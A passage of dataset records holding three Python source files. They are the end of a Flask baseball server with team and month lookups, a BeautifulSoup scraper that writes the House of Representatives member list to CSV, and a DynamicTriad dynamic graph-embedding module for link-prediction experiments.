\"OAK\",\r\n \"Phillies\": \"PHI\",\r\n \"Pirates\": \"PIT\",\r\n \"Padres\": \"SDN\",\r\n \"Giants\": \"SFN\",\r\n \"Mariners\": \"SEA\",\r\n \"Cardinals\": \"SLN\",\r\n \"Rays\": \"TBA\",\r\n \"Rangers\": \"TEX\",\r\n \"Blue Jays\": \"TOR\",\r\n \"Nationals\": \"WAS\"\r\n }\r\n\r\n convertedName = teamNames[team]\r\n return convertedName\r\n\r\ndef convertMonth(month):\r\n months = {1: \"January\",\r\n 2: \"February\",\r\n 3: \"March\",\r\n 4: \"April\",\r\n 5: \"May\",\r\n 6: \"June\",\r\n 7: \"July\",\r\n 8: \"August\",\r\n 9: \"September\",\r\n 10: \"October\",\r\n 11: \"November\",\r\n 12: \"December\"}\r\n\r\n newMonth = months[month]\r\n return newMonth\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n\r\n","repo_name":"delevan98/Senior-Project","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16891931912","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nurl = 'https://www.house.gov/representatives'\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\n\nresults = soup.find('div', class_='view-content')\nstates = results.find_all('table', class_='table')\n\np = 0\nwith open('congress.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow([\"First Name\", \"Last Name\", \"State\", \"C.D.\", \"Party\", \"Phone Number\"])\n for i in states:\n state_name = i.find('caption').text.strip()\n\n members = i.find('tbody').find_all('tr')\n 
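# each <tr> in the state's table is one representative\n        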
print(state_name)\n\n        for member in members:\n            district, name, party, office, phone, assignment = [e.text.strip() for e in member.find_all('td')]\n            if ',' in name:\n                kr = name.split(\",\")\n                first_name = kr[1].strip()\n                last_name = kr[0].strip()\n            else:\n                first_name = name\n                last_name = \"\"\n            writer.writerow([first_name, last_name, state_name, district, party, phone])\n\n","repo_name":"Horrgs/politics","sub_path":"congress_list_scraper.py","file_name":"congress_list_scraper.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4427639304","text":"from __future__ import print_function\ndisp_avlbl = True\nimport os\nif os.name == 'posix' and 'DISPLAY' not in os.environ:\n    disp_avlbl = False\n    import matplotlib\n\n    matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys\nsys.path.append('./')\nsys.path.append(os.path.realpath(__file__))\nfrom .static_graph_embedding import StaticGraphEmbedding\nfrom dynamicgem.utils import graph_util, plot_util, dataprep_util\nfrom dynamicgem.evaluation import visualize_embedding as viz\nfrom .sdne_utils import *\nfrom keras import backend as KBack\nimport tensorflow as tf\nimport argparse\nfrom dynamicgem.graph_generation import dynamic_SBM_graph\nimport operator\nimport time\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\nfrom dynamicgem.dynamictriad.core import *\nfrom six.moves import cPickle\nimport importlib\nfrom os.path import isfile\nimport dynamicgem.dynamictriad.core.dataset.dataset_utils as du\nimport dynamicgem.dynamictriad.core.algorithm.embutils as eu\nfrom dynamicgem.evaluation import evaluate_link_prediction as lp\nimport pdb\nfrom sklearn.linear_model import LogisticRegression\nimport random\n\ntry:\n    from sklearn.model_selection import cross_val_score, KFold, StratifiedKFold\nexcept ImportError:\n    from sklearn.cross_validation import cross_val_score, KFold, StratifiedKFold\nfrom sklearn import svm\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\n\n\nclass dynamicTriad(StaticGraphEmbedding):\n    \"\"\" Initialize the embedding class\n        Args:\n            t : Type of data to test the code\n            nm : number of nodes to migrate\n            iter : number of optimization iterations\n            m : start time (CLI help suppressed via argparse.SUPPRESS)\n            d : input directory name\n            b : batchsize for training\n            n : number of time steps\n            K : number of embedding dimensions\n            l : size of a time step\n            s : interval between two time steps\n            o : output directory name\n            rd : result directory name\n            lr : initial learning rate\n            beta-smooth : coefficients for smooth component\n            beta-triad : coefficients for triad component\n            negdup : neg/pos ratio during sampling\n            datasetmod : module name for dataset loading\n            dataname : name for the current data file\n            validation : validation task (default: link_reconstruction)\n            te : type of test (node_classify, node_predict, link_classify, link_predict,\n                 changed_link_classify, changed_link_predict, all)\n            classifier : lr, svm\n            repeat : number of times to repeat experiment\n            sm : samples for test data\n        \"\"\"\n\n    def __init__(self, d, *hyper_dict, **kwargs):\n        self._d = d\n        hyper_params = {\n            'method_name': 'Dynamic TRIAD',\n            'modelfile': None,\n            'weightfile': None,\n            'savefilesuffix': None\n\n        }\n        hyper_params.update(kwargs)\n        for key in hyper_params.keys():\n            self.__setattr__('_%s' % key, hyper_params[key])\n        for dictionary in hyper_dict:\n            for key in dictionary:\n                
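# copy remaining hyperparameters onto the instance as private attributes\n                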
self.__setattr__('_%s' % key, dictionary[key])\n        self.clf = self.__make_classifier()\n        self._model = None\n        # self._clname='lr' \n\n    def __make_classifier(self):\n        class_weight = 'balanced'\n\n        if self._clname == 'svm':\n            return svm.SVC(kernel='linear', class_weight=class_weight)\n        elif self._clname == 'lr':\n            return LogisticRegression(class_weight=class_weight)\n        else:\n            raise NotImplementedError()\n\n    def load_trainmod(self, modname):\n        mod = importlib.import_module(modname)\n        return getattr(mod, 'Model')\n\n    def load_datamod(self, modname):\n        mod = importlib.import_module(modname)\n        return getattr(mod, 'Dataset')\n\n    def load_or_update_cache(self, ds, cachefn):\n        if cachefn is None:\n            return\n        cachefn += '.cache'\n        if isfile(cachefn + '.args'):\n            args = cPickle.load(open(cachefn + '.args', 'rb'))\n            try:\n                ds.load_cache(args, lambda: cPickle.load(open(cachefn, 'rb')))\n                print(\"Data loaded from cache file {}\".format(cachefn))\n                return\n            except (ValueError, EOFError) as e:\n                print(\"Failed to load cache file {}: {}\".format(cachefn, e))\n\n        # update cache\n        print(\"updating cache file for prefix {}\".format(cachefn))\n        ar, args = ds.cache()\n        cPickle.dump(args, open(cachefn + '.args', 'wb'))\n        cPickle.dump(ar, open(cachefn, 'wb'))\n        print(\"cache file {} updated\".format(cachefn))\n\n    def export(self, vertices, data, outdir):\n\n        outdir = outdir + '/' + self._datatype\n        if not os.path.exists(outdir):\n            os.mkdir(outdir)\n        outdir = outdir + '/dynTriad'\n        if not os.path.exists(outdir):\n            os.mkdir(outdir)\n        for i in range(len(data)):\n            assert len(vertices) == len(data[i]), (len(vertices), len(data[i]))\n            fn = \"{}/{}.out\".format(outdir, i)\n            fh = open(fn, 'w')\n            for j in range(len(vertices)):\n                print(\"{} {}\".format(vertices[j], ' '.join([\"{:.3f}\".format(d) for d in data[i][j]])), file=fh)\n            fh.close()\n\n    def load_embedding(self, fn, vs):\n        data = open(fn, 'r').read().rstrip('\\n').split('\\n')\n        emb = {}\n        for line in data:\n            fields = line.split()\n            emb[fields[0]] = [float(e) for e in fields[1:]]\n        # it is possible that the output order differs from :param vs: given different node_type,\n        # so we have to reorder the embedding according to :param vs:\n        emb = [emb[str(v)] for v in vs]\n\n        return np.vstack(emb)\n\n    def get_method_name(self):\n        return self._method_name\n\n    def get_method_summary(self):\n        return '%s_%d' % (self._method_name, self._d)\n\n    def learn_embedding(self):\n\n        # TensorFlow wizardry\n        config = tf.ConfigProto()\n\n        # Don't pre-allocate memory; allocate as-needed\n        config.gpu_options.allow_growth = True\n\n        # Only allow 20% of the GPU memory to be allocated\n        config.gpu_options.per_process_gpu_memory_fraction = 0.2\n\n        # Create a session to pass the above configuration\n        sess = tf.Session(config=config)\n\n        # Create a tensorflow debugger wrapper\n        # sess = tf_debug.LocalCLIDebugWrapperSession(sess) \n\n        # Create a session with the above options specified.\n        KBack.tensorflow_backend.set_session(sess)\n\n        TrainModel = self.load_trainmod(self._trainmod)\n        Dataset = self.load_datamod(self._datasetmod)\n\n        ds = Dataset(self._datafile, self._starttime, self._nsteps, stepsize=self._stepsize,\n                     stepstride=self._stepstride)\n        # self.load_or_update_cache(ds, self._cachefn)\n        # dsargs = {'datafile': self._datafile, 'starttime': self._starttime, 'nsteps': self._nsteps,\n        #           'stepsize': self._stepsize, 'stepstride': self._stepstride, 'datasetmod': self._datasetmod}\n        tm = TrainModel(ds, pretrain_size=self._pretrain_size, embdim=self._embdim, beta=self._beta,\n                        
lr=self._lr, batchsize=self._batchsize, sampling_args=self._sampling_args)\n\n edgecnt = [g.num_edges() for g in ds.gtgraphs]\n k_edgecnt = sum(edgecnt[:self._pretrain_size])\n print(\"{} edges in pretraining graphs\".format(k_edgecnt))\n\n if self._pretrain_size > 0:\n initstep = int(ds.time2step(self._starttime))\n tm.pretrain_begin(initstep, initstep + self._pretrain_size)\n\n print(\"generating validation set\")\n validargs = tm.dataset.sample_test_data(self._validation, initstep, initstep + self._pretrain_size,\n size=10000)\n # print(validargs)\n print(\"{} validation samples generated\".format(len(validargs[0])))\n\n max_val, max_idx, maxmodel = -1, 0, None\n\n # for early stopping\n start_time = time.time()\n scores = []\n for i in range(self._niters):\n tm.pretrain_begin_iteration()\n\n epoch_loss = 0\n for batidx, bat in enumerate(tm.batches(self._batchsize)):\n inputs = tm.make_pretrain_input(bat)\n l = tm.pretrain['lossfunc'](inputs)\n if isinstance(l, (list, tuple)):\n l = l[0]\n epoch_loss += l\n print(\"\\repoch {}: {:.0%} completed, cur loss: {:.3f}\".format(i, float(batidx * self._batchsize)\n / tm.sample_size(), l.flat[0]),\n end='')\n sys.stdout.flush()\n tm.pretrain_end_iteration()\n\n print(\" training completed, total loss {}\".format(epoch_loss), end='')\n\n # without validation, the model exists only after I iterations\n if self._validation != 'none':\n val_score = tm.validate(self._validation, *validargs)\n\n if val_score > max_val:\n max_val = val_score\n max_idx = i\n maxmodel = tm.save_model()\n print(\", validation score {:.3f}\".format(val_score))\n else:\n max_idx, max_val = i, epoch_loss\n # maxmodel is not saved here in order to save time\n print(\"\")\n\n # checkpoint disabled\n # if i % 5 == 0:\n # lastmodel = tm.save_model()\n # if args.validation == 'none':\n # maxmodel = lastmodel\n #\n # tm.restore_model(maxmodel) # restore parameters while preserving other info\n # cPickle.dump([tm.archive(), dsargs, lastmodel], open(self._outdir, 'w'))\n # tm.restore_model(lastmodel)\n\n if self._validation != 'none':\n scores.append(val_score)\n if max_val > 0 and i - max_idx > 5:\n break\n\n print(\"best validation score at itr {}: {}\".format(max_idx, max_val))\n print(\"{} seconds elapsed for pretraining\".format(time.time() - start_time))\n # lastmodel = tm.save_model() # for debug\n print(\"saving output to {}\".format(self._outdir))\n tm.restore_model(maxmodel)\n tm.pretrain_end()\n self.export(tm.dataset.mygraphs['any'].vertices(), tm.export(), self._outdir)\n\n # online training disabled\n startstep = int(tm.dataset.time2step(self._starttime))\n for y in range(startstep + self._pretrain_size, startstep + self._nsteps):\n raise NotImplementedError()\n\n def get_embedding(self):\n self._X = dataprep_util.getemb_dynTriad(self._outdir + '/' + self._testDataType + '/dynTriad', self._nsteps,\n self._embdim)\n return self._X\n\n def get_edge_weight(self, t, i, j):\n try:\n feat = np.fabs(self._X[t][i, :] - self._X[t][j, :])\n # val= 1/(1+np.mean(np.fabs(self._X[t][i,:]- self._X[t][j,:])))\n # val= 1/(1+np.linalg.norm(self._X[t][i,:]- self._X[t][j,:]))\n # print(val)\n # pdb.set_trace()\n # return self._model.predict_proba(np.reshape(feat,[1,-1]))[0][1]\n return self._model.predict(np.reshape(feat, [1, -1]))[0]\n # return val\n except:\n pdb.set_trace()\n\n def get_reconstructed_adj(self, t, X=None, node_l=None):\n if X is not None:\n node_num = X.shape[0]\n # self._X = X\n else:\n node_num = self._node_num\n adj_mtx_r = np.zeros((node_num, node_num))\n for v_i in 
range(node_num):\n for v_j in range(node_num):\n if v_i == v_j:\n continue\n adj_mtx_r[v_i, v_j] = self.get_edge_weight(t, v_i, v_j)\n return adj_mtx_r\n\n def sample_link_reconstruction(self, g, sample_nodes=None, negdup=1):\n pos = []\n # assert not g.is_directed()\n # for g in graphs:\n for e in g.edges():\n if int(e[0]) > int(e[1]):\n # check symmetric\n names = list(g.nodes())\n assert g.edges(e[0], e[1]), \"{}: {} {}\".format(names[e[0]],\n names[e[1]])\n continue\n pos.append([int(e[0]), int(e[1])])\n pos = np.vstack(pos).astype('int32')\n\n neg = []\n vsize = len(g.nodes())\n nodenames = list(g.nodes())\n for i in range(negdup):\n for p in pos:\n src, tgt = p\n # g = self.mygraphs[tm + intv]\n assert g.out_degree(nodenames[src]) < vsize - 1 or g.out_degree(nodenames[tgt]) < vsize - 1, \\\n \"We do not expect any node to connect to all other nodes\"\n\n while True:\n if random.randint(0, 1) == 0: # replace source\n # cur_range = negrange[tm][tgt]\n # new_src = cur_range[random.randint(0, len(cur_range) - 1)]\n new_src = random.randint(0, vsize - 1)\n if not g.has_edge(nodenames[new_src], nodenames[tgt]):\n neg.append([new_src, tgt])\n break\n else: # replace target\n # cur_range = negrange[tm][src]\n # new_tgt = cur_range[random.randint(0, len(cur_range) - 1)]\n new_tgt = random.randint(0, vsize - 1)\n if not g.has_edge(nodenames[src], nodenames[new_tgt]):\n neg.append([src, new_tgt])\n break\n neg = np.vstack(neg).astype('int32')\n\n lbs = np.concatenate((np.ones(len(pos)), -np.ones(len(neg))))\n return np.concatenate((pos, neg), axis=0), lbs\n\n class ResultPresenter(object):\n def __init__(self):\n self.f1, self.prec, self.rec, self.acc = [], [], [], []\n\n def add_result(self, res):\n self.prec.extend(res[0])\n self.rec.extend(res[1])\n self.f1.extend(res[2])\n self.acc.extend(res[3])\n\n def show_result(self):\n print(\"precision mean: {} std: {}\".format(np.mean(self.prec), np.std(self.prec)))\n print(\"recall mean: {} std: {}\".format(np.mean(self.rec), np.std(self.rec)))\n print(\"f1 mean: {} std: {}\".format(np.mean(self.f1), np.std(self.f1)))\n print(\"accuracy mean: {} std: {}\".format(np.mean(self.acc), np.std(self.acc)))\n\n def __classify(self, feat, lbs):\n sm = None\n\n poscnt, negcnt = np.sum(lbs == 1), np.sum(lbs == -1)\n print(\"classifying with pos:neg = {}:{}\".format(poscnt, negcnt))\n\n try:\n cv = StratifiedKFold(n_splits=5, shuffle=True)\n parts = cv.split(feat, lbs)\n except TypeError:\n cv = StratifiedKFold(lbs, n_folds=5, shuffle=True)\n parts = cv\n\n f1, prec, rec, acc = [], [], [], []\n for tr, te in parts:\n if sm is not None:\n x, y = sm.fit_sample(feat[tr], lbs[tr])\n # x, y = feat[tr], lbs[tr]\n else:\n x, y = feat[tr], lbs[tr]\n model = self.clf.fit(x, y)\n p = model.predict(feat[te])\n # self._model=model\n # if self.debug:\n # print(\"results:\", p, lbs[te])\n # print(p,np.shape(p))\n f1.append(f1_score(lbs[te], p))\n prec.append(precision_score(lbs[te], p))\n rec.append(recall_score(lbs[te], p))\n acc.append(accuracy_score(lbs[te], p))\n # idx = np.random.permutation(len(lbs))\n # x,y = feat[idx], lbs[idx]\n # self._model=self.clf.fit(x, y) \n return prec, rec, f1, acc\n\n def link_predict(self, g, t, intv=0, repeat=1):\n samp, lbs = self.sample_link_reconstruction(g, sample_nodes=None, negdup=1)\n # pdb.set_trace()\n # TODO: different feature generation method might be used here\n try:\n feat = np.fabs(self._X[t][samp[:, 0]] - self._X[t][samp[:, 1]])\n except:\n pdb.set_trace()\n print(\"feature shape {}\".format(feat.shape))\n\n # rp = 
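sample_link_reconstruction above draws one negative pair per positive edge by re-sampling a random endpoint until the candidate pair is disconnected. A compact stand-alone version of that rejection sampler (networkx is assumed available; the karate-club graph is only a toy input):

import random
import networkx as nx

def sample_negative_edges(g, negdup=1, seed=0):
    # One non-edge per positive edge and per duplicate, drawn by
    # replacing a random endpoint until the pair is unconnected.
    rng = random.Random(seed)
    nodes = list(g.nodes())
    neg = []
    for u, v in g.edges():
        for _ in range(negdup):
            while True:
                cand = (rng.choice(nodes), v) if rng.random() < 0.5 else (u, rng.choice(nodes))
                if cand[0] != cand[1] and not g.has_edge(*cand):
                    neg.append(cand)
                    break
    return neg

g = nx.karate_club_graph()
print(len(sample_negative_edges(g)), "negatives for", g.number_of_edges(), "positives")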
self.ResultPresenter()\n # for i in range(repeat):\n # res = self.__classify(feat, lbs)\n # rp.add_result(res)\n # rp.show_result()\n\n idx = np.random.permutation(len(lbs))\n x, y = feat[idx], lbs[idx]\n self._model = self.clf.fit(x, y)\n\n def predict_next_adj(self, t, node_l=None):\n if node_l is not None:\n return self.get_reconstructed_adj(t, node_l)\n else:\n return self.get_reconstructed_adj(t)\n\n def plotresults(self, dynamic_sbm_series):\n plt.figure()\n plt.clf()\n viz.plot_static_sbm_embedding(self._X[-4:], dynamic_sbm_series[-4:])\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Learns static node embeddings')\n parser.add_argument('-t', '--testDataType',\n default='sbm_cd',\n type=str,\n help='Type of data to test the code')\n parser.add_argument('-nm', '--nodemigration',\n default=10,\n type=int,\n help='number of nodes to migrate')\n parser.add_argument('-iter', '--niters',\n type=int,\n help=\"number of optimization iterations\",\n default=20)\n parser.add_argument('-m', '--starttime',\n type=str,\n help=argparse.SUPPRESS,\n default=0)\n parser.add_argument('-d', '--datafile',\n type=str,\n help='input directory name')\n parser.add_argument('-b', '--batchsize',\n type=int,\n help=\"batchsize for training\",\n default=1000)\n parser.add_argument('-n', '--nsteps',\n type=int,\n help=\"number of time steps\",\n default=10)\n parser.add_argument('-K', '--embdim',\n type=int,\n help=\"number of embedding dimensions\",\n default=128)\n parser.add_argument('-l', '--stepsize',\n type=int,\n help=\"size of of a time steps\",\n default=1)\n parser.add_argument('-s', '--stepstride',\n type=int,\n help=\"interval between two time steps\",\n default=1)\n parser.add_argument('-o', '--outdir',\n type=str,\n default='./output',\n help=\"output directory name\")\n parser.add_argument('-rd', '--resultdir',\n type=str,\n default='./results_link_all',\n help=\"result directory name\")\n parser.add_argument('--lr',\n type=float,\n help=\"initial learning rate\",\n default=0.1)\n parser.add_argument('--beta-smooth',\n type=float,\n default=0.1,\n help=\"coefficients for smooth component\")\n parser.add_argument('--beta-triad',\n type=float,\n default=0.1,\n help=\"coefficients for triad component\")\n parser.add_argument('--negdup',\n type=int,\n help=\"neg/pos ratio during sampling\",\n default=1)\n parser.add_argument('--datasetmod',\n type=str,\n default='core.dataset.adjlist',\n help='module name for dataset loading',\n )\n parser.add_argument('--validation',\n type=str,\n default='link_reconstruction',\n help=', '.join(list(sorted(set(du.TestSampler.tasks) & set(eu.Validator.tasks)))))\n parser.add_argument('-te', '--test',\n type=str,\n nargs='+',\n default='link_predict',\n help='type of test, (node_classify, node_predict, link_classify, link_predict, '\n 'changed_link_classify, changed_link_predict, all)')\n parser.add_argument('--classifier',\n type=str,\n default='lr',\n help='lr, svm')\n parser.add_argument('--repeat',\n type=int,\n default=1,\n help='number of times to repeat experiment')\n parser.add_argument('-sm', '--samples',\n default=5000,\n type=int,\n help='samples for test data')\n args = parser.parse_args()\n args.embdir = args.outdir + '/dynTriad/' + args.testDataType\n args.cachefn = '/tmp/' + args.testDataType\n args.beta = [args.beta_smooth, args.beta_triad]\n # some fixed arguments in published code\n args.pretrain_size = args.nsteps\n args.trainmod = 'dynamictriad.core.algorithm.dynamic_triad'\n args.sampling_args = {}\n args.debug = 
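Both get_edge_weight and link_predict above featurise a candidate edge as the element-wise absolute difference of the two endpoint embeddings before handing it to the classifier. A toy restatement of that step (the sizes are arbitrary assumptions):

import numpy as np

emb = np.random.rand(10, 4)           # toy embeddings: 10 nodes, 4 dimensions
pairs = np.array([[0, 1], [2, 5]])    # sampled (src, tgt) index pairs
feat = np.fabs(emb[pairs[:, 0]] - emb[pairs[:, 1]])
# A common alternative edge feature is the Hadamard product:
# feat = emb[pairs[:, 0]] * emb[pairs[:, 1]]
print(feat.shape)                     # (2, 4): one feature row per candidate edge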
False\n args.scale = 1\n\n if args.validation not in du.TestSampler.tasks:\n raise NotImplementedError(\"Validation task {} not supported in TestSampler\".format(args.validation))\n if args.validation not in eu.Validator.tasks:\n raise NotImplementedError(\"Validation task {} not supported in Validator\".format(args.validation))\n\n print(\"running with options: \", args.__dict__)\n\n epochs = args.niters\n length = args.nsteps\n\n if args.testDataType == 'sbm_cd':\n node_num = 1000\n community_num = 2\n node_change_num = args.nodemigration\n dynamic_sbm_series = dynamic_SBM_graph.get_community_diminish_series_v2(node_num,\n community_num,\n length,\n 1,\n node_change_num)\n graphs = [g[0] for g in dynamic_sbm_series]\n\n datafile = dataprep_util.prep_input_dynTriad(graphs, length, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=node_num )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n # embedding.plotresults(dynamic_sbm_series)\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + 'dynTRIAD'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n lp.expstaticLP_TRIAD(dynamic_sbm_series,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'nm' + str(args.nodemigration) + '_l' + str(args.nsteps) + '_emb' + str(args.embdim),\n )\n\n\n elif args.testDataType == 'academic':\n print(\"datatype:\", args.testDataType)\n\n sample = args.samples\n if not os.path.exists('./test_data/academic/pickle'):\n os.mkdir('./test_data/academic/pickle')\n graphs, length = dataprep_util.get_graph_academic('./test_data/academic/adjlist')\n for i in range(length):\n nx.write_gpickle(graphs[i], './test_data/academic/pickle/' + str(i))\n else:\n length = len(os.listdir('./test_data/academic/pickle'))\n graphs = []\n for i in range(length):\n graphs.append(nx.read_gpickle('./test_data/academic/pickle/' + str(i)))\n\n G_cen = nx.degree_centrality(graphs[29]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n # pdb.set_trace()\n # node_l = np.random.choice(range(graphs[29].number_of_nodes()), 5000, replace=False)\n # print(node_l)\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n # pdb.set_trace()\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n 
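The result-directory setup above (and in every dataset branch below) repeats the same "check, then mkdir" chain three times. os.makedirs collapses this: it creates intermediate directories and, with exist_ok=True, is a no-op when the path already exists. A sketch with directory names mirroring the defaults above:

import os

def ensure_dir(*parts):
    path = os.path.join(*parts)
    os.makedirs(path, exist_ok=True)  # creates intermediates, tolerates existing dirs
    return path

outdir = ensure_dir("./results_link_all", "sbm_cd", "dynTRIAD")
print(outdir)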
beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n\n elif args.testDataType == 'hep':\n print(\"datatype:\", args.testDataType)\n\n if not os.path.exists('./test_data/hep/pickle'):\n os.mkdir('./test_data/hep/pickle')\n files = [file for file in os.listdir('./test_data/hep/hep-th') if '.gpickle' in file]\n length = len(files)\n graphs = []\n for i in range(length):\n G = nx.read_gpickle('./test_data/hep/hep-th/month_' + str(i + 1) + '_graph.gpickle')\n\n graphs.append(G)\n total_nodes = graphs[-1].number_of_nodes()\n\n for i in range(length):\n for j in range(total_nodes):\n if j not in graphs[i].nodes():\n graphs[i].add_node(j)\n\n for i in range(length):\n nx.write_gpickle(graphs[i], './test_data/hep/pickle/' + str(i))\n else:\n length = len(os.listdir('./test_data/hep/pickle'))\n graphs = []\n for i in range(length):\n graphs.append(nx.read_gpickle('./test_data/hep/pickle/' + str(i)))\n\n # pdb.set_trace() \n sample = args.samples\n G_cen = nx.degree_centrality(graphs[-1]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n\n elif args.testDataType 
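The academic, hep and AS branches all down-sample to the `--samples` nodes with the highest degree centrality in a reference snapshot. Isolated as a helper (nx.subgraph stands in here for the project-specific graph_util.sample_graph_nodes):

import networkx as nx

def top_k_by_degree_centrality(g, k):
    cen = nx.degree_centrality(g)
    ranked = sorted(cen.items(), key=lambda kv: kv[1], reverse=True)
    return [node for node, _ in ranked[:k]]

g = nx.gnp_random_graph(100, 0.05, seed=1)
node_l = top_k_by_degree_centrality(g, 10)
print(g.subgraph(node_l).number_of_nodes())   # 10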
== 'AS':\n print(\"datatype:\", args.testDataType)\n\n files = [file for file in os.listdir('./test_data/AS/as-733') if '.gpickle' in file]\n length = len(files)\n graphs = []\n\n for i in range(length):\n G = nx.read_gpickle('./test_data/AS/as-733/month_' + str(i + 1) + '_graph.gpickle')\n graphs.append(G)\n\n sample = args.samples\n G_cen = nx.degree_centrality(graphs[-1]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + 